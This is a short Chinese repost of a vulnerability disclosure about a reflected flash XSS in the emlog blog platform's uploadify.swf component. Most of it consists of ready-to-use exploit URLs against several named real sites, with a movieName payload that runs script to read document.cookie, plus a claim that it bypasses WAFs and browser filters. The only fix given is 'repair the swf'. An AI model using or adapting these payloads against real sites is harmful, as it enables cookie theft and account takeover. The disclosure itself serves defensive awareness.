官方主机站测试一下:
http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 开发者之一奇遇的博客: http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 思想之地: http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// 等等我就不多列举了。 因为是flash xss,所以无视服务端WAF,无视 浏览器 filter~ 关于这个swf我就不想多说了,老问题。
修复方案:修复swf
查看更多关于emlog博客前台反射型XSS(无视浏览器filter) - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15123